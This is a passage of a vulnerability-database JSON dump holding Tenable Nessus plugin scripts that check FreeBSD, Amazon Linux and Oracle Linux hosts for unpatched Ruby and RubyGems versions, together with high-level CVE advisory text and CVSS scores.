value:\"p-cpe:/a:freebsd:freebsd:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=2.2.0<2.2.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=2.3.0<2.3.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=2.4.0<2.4.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:21:40", "description": "SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM\ncommands in Net::SMTP\n\nA SMTP command injection flaw was found in the way Ruby's Net::SMTP\nmodule handled CRLF sequences in certain SMTP commands. An attacker\ncould potentially use this flaw to inject SMTP commands in a SMTP\nsession in order to facilitate phishing attacks or spam campaigns.\n(CVE-2015-9096)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby allows remote\nattackers to inject terminal emulator escape sequences into its log\nand possibly execute arbitrary commands via a crafted user name.\n(CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby allows attackers\nto cause a denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems is vulnerable to maliciously crafted gem specifications to\ncause a denial of service attack against RubyGems clients who have\nissued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems fails to validate specification names, allowing a maliciously\ncrafted gem to potentially overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems is vulnerable to a DNS hijacking vulnerability that allows a\nMITM attacker to force the RubyGems client to download and install\ngems from a server that the attacker controls. (CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby is vulnerable to a malicious format string which contains a\nprecious specifier (*) with a huge minus value. Such situation can\nlead to a buffer overrun, resulting in a heap memory corruption or an\ninformation disclosure from the heap. (CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems is vulnerable to maliciously crafted gem specifications that\ninclude terminal escape characters. Printing the gem specification\nwould execute terminal escape sequences. (CVE-2017-0899)\n\nArbitrary heap exposure during a JSON.generate call\n\nRuby can expose arbitrary memory during a JSON.generate call. The\nissues lies in using strdup in ext/json/ext/generator/generator.c,\nwhich will stop after encountering a '\\\\0' byte, returning a pointer\nto a string of length zero, which is not the length stored in\nspace_len. (CVE-2017-14064)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-03T00:00:00", "title": "Amazon Linux AMI : ruby22 / ruby23 (ALAS-2017-906)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2015-9096", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:rubygems22-devel", "p-cpe:/a:amazon:linux:ruby23-debuginfo", "p-cpe:/a:amazon:linux:rubygem22-io-console", "p-cpe:/a:amazon:linux:rubygem22-bigdecimal", "p-cpe:/a:amazon:linux:ruby22", "p-cpe:/a:amazon:linux:ruby22-devel", "p-cpe:/a:amazon:linux:rubygem23-io-console", "p-cpe:/a:amazon:linux:rubygems23-devel", "p-cpe:/a:amazon:linux:rubygem22-psych", "p-cpe:/a:amazon:linux:ruby23-irb", "p-cpe:/a:amazon:linux:ruby22-irb", "p-cpe:/a:amazon:linux:rubygem23-did_you_mean", "p-cpe:/a:amazon:linux:rubygems23", "p-cpe:/a:amazon:linux:rubygems22", "p-cpe:/a:amazon:linux:rubygem23-bigdecimal", "p-cpe:/a:amazon:linux:ruby22-debuginfo", "p-cpe:/a:amazon:linux:ruby22-doc", "p-cpe:/a:amazon:linux:ruby23-devel", "p-cpe:/a:amazon:linux:rubygem23-json", "p-cpe:/a:amazon:linux:ruby23-libs", "p-cpe:/a:amazon:linux:rubygem23-psych", "p-cpe:/a:amazon:linux:ruby22-libs", "p-cpe:/a:amazon:linux:ruby23", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:ruby23-doc"], "id": "ALA_ALAS-2017-906.NASL", "href": "https://www.tenable.com/plugins/nessus/103603", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-906.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103603);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/07/10 16:04:12\");\n\n script_cve_id(\"CVE-2015-9096\", \"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"ALAS\", value:\"2017-906\");\n\n script_name(english:\"Amazon Linux AMI : ruby22 / ruby23 (ALAS-2017-906)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM\ncommands in Net::SMTP\n\nA SMTP command injection flaw was found in the way Ruby's Net::SMTP\nmodule handled CRLF sequences in certain SMTP commands. An attacker\ncould potentially use this flaw to inject SMTP commands in a SMTP\nsession in order to facilitate phishing attacks or spam campaigns.\n(CVE-2015-9096)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby allows remote\nattackers to inject terminal emulator escape sequences into its log\nand possibly execute arbitrary commands via a crafted user name.\n(CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby allows attackers\nto cause a denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems is vulnerable to maliciously crafted gem specifications to\ncause a denial of service attack against RubyGems clients who have\nissued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems fails to validate specification names, allowing a maliciously\ncrafted gem to potentially overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems is vulnerable to a DNS hijacking vulnerability that allows a\nMITM attacker to force the RubyGems client to download and install\ngems from a server that the attacker controls. (CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby is vulnerable to a malicious format string which contains a\nprecious specifier (*) with a huge minus value. Such situation can\nlead to a buffer overrun, resulting in a heap memory corruption or an\ninformation disclosure from the heap. (CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems is vulnerable to maliciously crafted gem specifications that\ninclude terminal escape characters. Printing the gem specification\nwould execute terminal escape sequences. (CVE-2017-0899)\n\nArbitrary heap exposure during a JSON.generate call\n\nRuby can expose arbitrary memory during a JSON.generate call. The\nissues lies in using strdup in ext/json/ext/generator/generator.c,\nwhich will stop after encountering a '\\\\0' byte, returning a pointer\nto a string of length zero, which is not the length stored in\nspace_len. (CVE-2017-14064)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-906.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update ruby22' to update your system.\n\nRun 'yum update ruby23' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-did_you_mean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems23\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems23-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-debuginfo-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-devel-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-doc-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-irb-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-libs-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-debuginfo-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-devel-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-doc-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-irb-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-libs-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-bigdecimal-1.2.6-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-io-console-0.4.3-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-psych-2.0.8.1-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-bigdecimal-1.2.8-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-did_you_mean-1.0.0-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-io-console-0.4.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-json-1.8.3.1-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-psych-2.1.0.1-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-2.4.5.2-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-devel-2.4.5.2-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems23-2.5.2.1-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems23-devel-2.5.2.1-1.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby22 / ruby22-debuginfo / ruby22-devel / ruby22-doc / ruby22-irb / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:07:15", "description": "From Red Hat Security Advisory 2018:0378 :\n\nAn update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during\ninstallation of a given gem. A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. (CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. (CVE-2017-17790)", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-01T00:00:00", "title": "Oracle Linux 7 : ruby (ELSA-2018-0378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ruby-doc", "p-cpe:/a:oracle:linux:rubygem-psych", "p-cpe:/a:oracle:linux:rubygem-rdoc", "p-cpe:/a:oracle:linux:ruby-irb", "p-cpe:/a:oracle:linux:rubygem-json", "p-cpe:/a:oracle:linux:rubygem-io-console", "p-cpe:/a:oracle:linux:ruby-devel", "p-cpe:/a:oracle:linux:rubygem-bigdecimal", "p-cpe:/a:oracle:linux:rubygem-rake", "p-cpe:/a:oracle:linux:ruby", "p-cpe:/a:oracle:linux:rubygem-minitest", "p-cpe:/a:oracle:linux:rubygems", "p-cpe:/a:oracle:linux:rubygems-devel", "p-cpe:/a:oracle:linux:ruby-tcltk", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:ruby-libs"], "id": "ORACLELINUX_ELSA-2018-0378.NASL", "href": "https://www.tenable.com/plugins/nessus/107080", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:0378 and \n# Oracle Linux Security Advisory ELSA-2018-0378 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107080);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_xref(name:\"RHSA\", value:\"2018:0378\");\n\n script_name(english:\"Oracle Linux 7 : ruby (ELSA-2018-0378)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:0378 :\n\nAn update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during\ninstallation of a given gem. A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. (CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. (CVE-2017-17790)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007545.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygems-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-devel-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", 